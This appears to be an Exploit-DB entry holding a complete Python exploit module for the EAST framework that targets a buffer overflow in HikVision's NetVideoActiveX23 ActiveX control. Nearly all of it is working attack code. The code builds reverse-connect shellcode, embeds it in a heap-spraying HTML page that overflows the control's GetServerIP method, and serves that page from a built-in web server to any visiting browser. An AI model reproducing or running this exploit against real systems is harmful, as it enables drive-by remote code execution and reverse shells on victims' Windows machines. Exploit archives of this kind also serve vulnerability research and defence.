HikVision Security Systems - Activex Buffer Overflow

EDB-ID:

40578

CVE:

N/A


Platform:

Windows

Published:

2016-10-19

#!/usr/bin/env python
# The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution
# visit eastfw.com  eastexploits.com for more info
import sys
import re
import os
import socket
import random
import string
from struct import pack

sys.path.append("./core")
from Sploit import Sploit
sys.path.append("./shellcodes")
from Shellcodes import OSShellcodes

INFO={}
INFO['NAME']="efa_HikVision_Security_Systems_activex"
INFO['DESCRIPTION']="HikVision Security Systems activex Remote Overflow"
INFO['VENDOR']="http://www.hikvision.com/us/Tools_84.html"
INFO["CVE Name"]="0-day"
INFO["NOTES"]="""
Exploit-db.com  information:
    # Exploit Title: HikVision Security Systems ActiveX exploit designed for EAST framework
    # Google Dork:  none
    # Date: 19 October 2016
    # Exploit Author: EAST framework development team. Yuriy Gurkin
    # Vendor Homepage: http://www.hikvision.com/us
    # Software Link: http://www.hikvision.com/us/Tools_84.html  client software
    # Version: v2.5.0.5
    # Tested on: Windows XP, 7
    # CVE : 0day
    
General information:
Loaded File: C:\temp\WEBCAM~1\HIKVIS~1\NETVID~1.OCX
Name:        NETVIDEOACTIVEX23Lib
Lib GUID:    {99F388E9-F788-41D5-A103-8F4961539F88}
Version:     1.0
Lib Classes: 1

Class NetVideoActiveX23
GUID: {CAFCF48D-8E34-4490-8154-026191D73924}
Number of Interfaces: 1
Default Interface: _DNetVideoActiveX23
RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False
"""

INFO['CHANGELOG']="13 Jan, 2016. Written by Gleg team."
INFO['PATH'] = "Exploits/"

PROPERTY = {}
PROPERTY['DESCRIPTION'] = "ActiveX 0-day"
PROPERTY['MODULE_TYPE'] = "Scada"

# Must be in every module, to be set by framework
OPTIONS = {}
OPTIONS["CONNECTBACK_PORT"] = "8089"

class exploit(Sploit):
    def __init__(self,
                port=8089, 
                logger=None):
        Sploit.__init__(self,logger=logger)
        self.port = port
        self.state = "running"
        return

    def args(self):
        self.args = Sploit.args(self, OPTIONS)
        self.port = int(self.args.get('CONNECTBACK_PORT', self.port))
        return

    def create_shellcode(self):
        self.CONNECTBACK_IP = socket.gethostbyname(socket.gethostname())
        if self.args['listener']:
            shellcode_type = 'reverse'
            port = int(self.args['listener']['PORT'])
        else:
            port = 9999
            shellcode_type = 'command'
        self.CONNECTBACK_PORT = port
        os_system = os_target = 'WINDOWS'
        os_arch = '32bit'
        s = OSShellcodes(os_target,
                        os_arch,
                        self.CONNECTBACK_IP,
                        self.CONNECTBACK_PORT)
        s.TIMESTAMP = 'codesys'
        shellcode = s.create_shellcode(
            shellcode_type,
            encode=0,
            debug=1
        )
        return shellcode

    def make_data(self, shellcode):
        filedata="""
        <html>
<object classid='clsid:CAFCF48D-8E34-4490-8154-026191D73924' id='target' ></object>
<script type='text/javascript' language="javascript">
ar=new Array();

function spray(buffer) {
    var hope   = unescape('%u9090%u9090');
    var unbuffer = unescape(buffer);
    var v      = 20 + unbuffer.length;

    while(hope.length<v)
         hope += hope;

    var fk = hope.substring(0, v);
    var bk = hope.substring(0, hope.length- v );
    delete v;
    delete hope;

    while(bk.length+v<0x40000) { 
       bk=bk+bk+fk;
    }
    for(i=0;i<3500;i++) {
       ar[i] = bk + unbuffer;
    }

}

spray(<SHELLCODE>);

        
buffer = "";
for (i = 0; i < 555; i++) buffer += unescape('%u9090%u9090');
target.GetServerIP (buffer);
</script>
</html>

        """
        if len(shellcode)%2:
            shellcode="\x90"+shellcode

        shell="unescape(\""
        i = 0
        while i < len(shellcode):
            shell += "%u"+"%02X%02X" %(ord(shellcode[i+1]),ord(shellcode[i]))     
            i += 2
        shell += "\")"
        filedata = filedata.replace("<SHELLCODE>", shell)
        return filedata

    def run(self):
        self.args()
        self.log("Generating shellcode")
        shellcode = self.create_shellcode()
        if not shellcode:
            self.log("Something goes wrong")
            return 0
        self.log("Generate Evil HTML")
        html = self.make_data(shellcode)
        self.log("Done")
        self.log("Starting web server")
        ip_server = "0.0.0.0"
        crlf = "\r\n"
        response = "HTTP/1.1 200 OK" + crlf
        response += "Content-Type: text/html" + crlf
        response += "Connection: close" + crlf
        response += "Server: Apache" + crlf
        response += "Content-Length: " + str(len(html))
        response += crlf + crlf + html + crlf
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        server = (ip_server, 8089)
        s.bind(server)
        s.listen(1)
        while True:
            try:
                connection, client_address = s.accept()
                data = connection.recv(2048)
                self.log("Got request, sending payload")
                connection.send(response)
                self.log("exploit send")
                connection.close()
            except:
                print("EXCEPT")
        self.log('All done')
        self.finish(True)
        return 1

if __name__ == '__main__':
    """
    By now we only have the tool
    mode for exploit..
    Later we would have
    standalone mode also.
    """
    print "Running exploit %s .. " % INFO['NAME']
    e = exploit("192.168.0.1",80)
    e.run()